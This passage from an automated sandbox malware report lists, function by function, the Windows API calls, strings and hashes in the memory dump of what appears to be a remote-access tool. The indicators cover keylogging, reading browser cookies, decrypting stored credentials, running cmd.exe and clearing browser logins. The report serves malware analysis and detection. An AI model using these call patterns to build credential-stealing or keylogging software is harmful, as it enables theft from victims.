                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: 2cc3b6ba48bacc831ba1a40558fe992ab2643beeaf10fb383513802fdaa5c2b9
                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                  • Opcode Fuzzy Hash: 2cc3b6ba48bacc831ba1a40558fe992ab2643beeaf10fb383513802fdaa5c2b9
                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,00475100,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,00475100,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,00475100,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 0a1df107feb565206a0f07d03fed44da855b8a7fdb4fccb7ab7f88aea59273de
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: 0a1df107feb565206a0f07d03fed44da855b8a7fdb4fccb7ab7f88aea59273de
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: bc29324037fb419ccbf0c3d240700705d67dca7a62f5556352e852a670fff763
                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                  • Opcode Fuzzy Hash: bc29324037fb419ccbf0c3d240700705d67dca7a62f5556352e852a670fff763
                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,00000000,0040F3F6,?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE42
                                                  • GetLastError.KERNEL32(?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE4C
                                                  • __dosmaperr.LIBCMT ref: 0044BE77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID: lQ
                                                  • API String ID: 2583163307-823513429
                                                  • Opcode ID: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                                  • Instruction ID: c640735ad7e51643fe6b0a0a71fefea3e0d0f945221813f090adf85c72c27ea1
                                                  • Opcode Fuzzy Hash: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                                  • Instruction Fuzzy Hash: AC01483260066866E624623858457BF6789CBC2739F35022FFE18872C3DF6CCC8181D9
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: e320f5be17afa3af91f58086374eea17b51b5638871a85ff1a9b600c50f210c0
                                                  • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                  • Opcode Fuzzy Hash: e320f5be17afa3af91f58086374eea17b51b5638871a85ff1a9b600c50f210c0
                                                  • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                  • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                                  • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                  • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: ee2b48b3d13bcbf5b7ca92b1a3c269701d129bdc8444e5c159cb0784c258acb2
                                                  • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                                  • Opcode Fuzzy Hash: ee2b48b3d13bcbf5b7ca92b1a3c269701d129bdc8444e5c159cb0784c258acb2
                                                  • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                  • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                  • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
                                                  • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 1818849710-27424756
                                                  • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                  • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,0Q), ref: 00413678
                                                  • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                  • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: 0Q
                                                  • API String ID: 3677997916-1780094543
                                                  • Opcode ID: 65d225e62495b603b94ecda2ada9fe67bc436a3b870d946b60a27cc720c1bdd3
                                                  • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                  • Opcode Fuzzy Hash: 65d225e62495b603b94ecda2ada9fe67bc436a3b870d946b60a27cc720c1bdd3
                                                  • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 186401046-604454484
                                                  • Opcode ID: 38362f61783cb715c69eec21349e7d76de8a39a806895df5bff65404a7ebb616
                                                  • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                  • Opcode Fuzzy Hash: 38362f61783cb715c69eec21349e7d76de8a39a806895df5bff65404a7ebb616
                                                  • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 42641b5cdaceb7d215b20ce15d5cc119e6eb5f839923887f01a60e99d8190058
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 42641b5cdaceb7d215b20ce15d5cc119e6eb5f839923887f01a60e99d8190058
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: fd9625d3d3dd930e6efe510565c92d19d8a09afb7a611057408a21d48d515413
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: fd9625d3d3dd930e6efe510565c92d19d8a09afb7a611057408a21d48d515413
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
